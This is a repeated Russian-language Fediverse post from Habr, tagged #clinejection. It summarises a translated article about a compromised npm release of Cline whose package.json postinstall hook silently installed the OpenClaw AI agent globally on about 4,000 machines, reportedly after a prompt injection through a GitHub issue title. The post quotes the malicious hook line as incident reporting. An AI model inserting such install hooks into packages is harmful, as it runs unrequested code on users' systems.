#clinejection — Public Fediverse posts on home.social

Habr @[email protected] · 2026-03-07 · 09:22 UTC

[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.

https://habr.com/ru/companies/bothub/articles/1007638/

#github #cline #openclaw #аднан_хан #stepsecurity #clinejection

#clinejection #stepsecurity #аднан_хан #openclaw #cline #github

Habr @[email protected] · 2026-03-07 · 09:22 UTC

[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.

https://habr.com/ru/companies/bothub/articles/1007638/

#github #cline #openclaw #аднан_хан #stepsecurity #clinejection

#clinejection #stepsecurity #аднан_хан #openclaw #cline #github

Habr @[email protected] · 2026-03-07 · 09:22 UTC

[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.

https://habr.com/ru/companies/bothub/articles/1007638/

#github #cline #openclaw #аднан_хан #stepsecurity #clinejection

#clinejection #stepsecurity #аднан_хан #openclaw #cline #github

Habr @[email protected] · 2026-03-07 · 09:22 UTC

[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.

https://habr.com/ru/companies/bothub/articles/1007638/

#github #cline #openclaw #аднан_хан #stepsecurity #clinejection